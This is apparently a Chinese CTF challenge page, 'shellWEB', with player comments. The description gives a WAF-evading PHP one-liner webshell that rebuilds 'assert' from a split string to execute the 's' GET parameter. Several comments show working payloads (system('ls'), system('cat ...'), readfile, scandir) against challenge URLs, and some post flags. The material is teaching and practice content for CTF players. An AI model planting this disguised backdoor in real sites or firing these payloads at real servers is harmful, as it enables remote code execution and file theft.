shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8841
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
聪仔草莓51 19天前

源码将字符串 a#s#s#e#r#t 按分隔符拆分后重新拼接成函数名 assert,并调用 assert(传入参数)。该函数在旧版本 PHP 中会把传入字符串当作代码执行,因此构造参数即可执行任意 PHP 代码。 利用方式:传入列目录的参数找到 flag 文件名,再传入读取文件的参数获取内容,即可得到本题答案。

回复 0

西红柿dun牛腩 1月前

这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材

回复 1

yiqie 1月前

flag{**********}

回复 0

icyskin 1月前

http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

ggsea 1月前

列出当前目录:?s=print_r(scandir('./')),看到flag.txt

回复 0

lawrencekz 2月前

flag{******}

回复 0

hwx 3月前

直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg

回复 2

b2026tf 3月前

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0

syhaisy 3月前

20702af5309ab1f70e0f7e8a81076a4e

回复 0

hualong 3月前

直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);

回复 1

WriteUp

image
harry

3 金币

评分(11)

解题动态

1234165 攻破了该题 18小时前
gm26ctf 攻破了该题 19小时前
沈玉鑫 攻破了该题 20小时前
mwhatevery 攻破了该题 21小时前
kimol 攻破了该题 1天前
zuiqhf 攻破了该题 1天前
kiwo 攻破了该题 1天前
nonlvyx 攻破了该题 1天前
goldfish 攻破了该题 2天前
苦味的辣条 攻破了该题 2天前
花猫咪 攻破了该题 2天前
001 攻破了该题 2天前
AWDAI 攻破了该题 3天前
wauo3 攻破了该题 3天前
小竹 攻破了该题 3天前
Star666 攻破了该题 3天前
2278788320 攻破了该题 3天前
sbhacker1 攻破了该题 4天前
bilabu 攻破了该题 4天前
Versemos 攻破了该题 4天前
问题反馈